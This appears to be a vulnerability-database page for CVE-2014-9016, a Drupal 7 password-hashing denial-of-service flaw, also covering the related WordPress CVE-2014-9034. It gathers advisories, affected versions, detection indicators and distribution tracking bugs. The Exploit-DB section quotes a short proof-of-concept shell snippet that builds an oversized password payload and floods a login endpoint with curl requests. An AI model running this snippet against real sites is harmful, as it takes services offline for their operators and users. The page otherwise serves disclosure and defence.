CVE-2014-9016
published 2014-11-24CVE-2014-9016: The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers…
PriorityP349medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
82.70%
99.6th percentile
The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | wordpress | < wordpress 4.0.1+dfsg-1 (bookworm) | wordpress 4.0.1+dfsg-1 (bookworm) |
| drupal | drupal | >= 7.0 < 7.34 | 7.34 |
| secure_password_hashes_project | secure_passwords_hashes | >= 6.x-2.0 < 6.x-2.1 | 6.x-2.1 |
| wordpress | wordpress | <= 3.7.4 | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for abnormally large POST body sizes targeting Drupal login endpoints (e.g., /?q=user or /user/login) — the DoS payload is constructed by appending a large repeated string to a valid credential payload, resulting in megabytes of password data sent per request. ↗
- →Detect rapid repeated POST requests to Drupal login form_id=user_login from the same source IP — the PoC sends up to 150 concurrent requests with 0.5s sleep intervals. ↗
- →Alert on sustained CPU exhaustion correlated with login endpoint POST requests containing extremely long password field values — the vulnerability is in the password hashing API triggered by specially crafted requests. ↗
- →This vulnerability can be exploited by anonymous (unauthenticated) users, so rate-limiting or blocking of unauthenticated login POST requests with oversized bodies is an effective mitigation signal. ↗
- ·The Metasploit auxiliary module for this DoS is available in the framework, which may be used for automated exploitation at scale. ↗
- ·The CVE-2014-9016 vulnerability is specific to Drupal 7's password hashing API (SA-CORE-2014-006), while the closely related CVE-2014-9034 affects WordPress's wp-includes/class-phpass.php — detection rules should cover both platforms' login endpoints. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2014-9034: wordpress - wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9....
vendor_debian·2014·CVSS 5.0
CVE-2014-9034 [MEDIUM] CVE-2014-9034: wordpress - wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9....
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
Scope: local
bookworm: resolved (fixed in 4.0.1+dfsg-1)
bullseye: resolved (fixed in 4.0.1+dfsg-1)
forky: resolved (fixed in 4.0.1+dfsg-1)
sid: resolved (fixed in 4.0.1+dfsg-1)
trixie: resolved (fixed in 4.0.1+dfsg-1)
GHSA
GHSA-wh45-5f5h-v3mq: wp-includes/class-phpass
ghsa_unreviewed·2022-05-17·CVSS 5.0
CVE-2014-9034 [MEDIUM] GHSA-wh45-5f5h-v3mq: wp-includes/class-phpass
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
GHSA
GHSA-cfc7-w9hw-779w: The password hashing API in Drupal 7
ghsa_unreviewed·2022-05-13
CVE-2014-9016 [MEDIUM] GHSA-cfc7-w9hw-779w: The password hashing API in Drupal 7
The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.
OSV
CVE-2014-9034: wp-includes/class-phpass
osv·2014-11-25·CVSS 5.0
CVE-2014-9034 [MEDIUM] CVE-2014-9034: wp-includes/class-phpass
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
OSV
CVE-2014-9016: The password hashing API in Drupal 7
osv·2014-11-24·CVSS 5.0
CVE-2014-9016 [MEDIUM] CVE-2014-9016: The password hashing API in Drupal 7
The password hashing API in Drupal 7.x before 7.34 and the Secure Password Hashes (aka phpass) module 6.x-2.x before 6.x-2.1 for Drupal allows remote attackers to cause a denial of service (CPU and memory consumption) via a crafted request.
No detection rules found.
Exploit-DB
Drupal < 7.34 - Denial of Service
exploitdb·2014-12-01
CVE-2014-9016 Drupal < 7.34 - Denial of Service
Drupal valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done
Authors:
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
References:
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
Metasploit
WordPress Long Password DoS
metasploit
WordPress Long Password DoS
WordPress Long Password DoS
WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing.
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006)
bugzilla·2014-11-20·CVSS 5.0
CVE-2014-9016 [MEDIUM] CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006)
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006)
Latest Drupal advisory [1] fixes denial of service vulnerability.
Drupal 7 includes a password hashing API to ensure that user supplied passwords are not stored in plain text.
A vulnerability in this API allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).
This vulnerability can be exploited by anonymous users.
[1]: https://www.drupal.org/SA-CORE-2014-006
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1166256]
Affects: epel-all [bug 1166257]
---
drupal7-7.34-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persis
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [epel-all]
bugzilla·2014-11-20·CVSS 5.0
CVE-2014-9016 [MEDIUM] CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [epel-all]
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple
Bugzilla
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [fedora-all]
bugzilla·2014-11-20·CVSS 5.0
CVE-2014-9016 [MEDIUM] CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [fedora-all]
CVE-2014-9016 drupal7: Denial of service in password hashing API (SA-CORE-2014-006) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
http://secunia.com/advisories/59164http://secunia.com/advisories/59814http://www.debian.org/security/2014/dsa-3075http://www.openwall.com/lists/oss-security/2014/11/20/21http://www.openwall.com/lists/oss-security/2014/11/20/3http://www.openwall.com/lists/oss-security/2014/11/21/1https://www.drupal.org/SA-CORE-2014-006https://www.drupal.org/node/2378367https://www.drupal.org/node/2378375http://secunia.com/advisories/59164http://secunia.com/advisories/59814http://www.debian.org/security/2014/dsa-3075http://www.openwall.com/lists/oss-security/2014/11/20/21http://www.openwall.com/lists/oss-security/2014/11/20/3http://www.openwall.com/lists/oss-security/2014/11/21/1https://www.drupal.org/SA-CORE-2014-006https://www.drupal.org/node/2378367https://www.drupal.org/node/2378375
2014-11-24
Published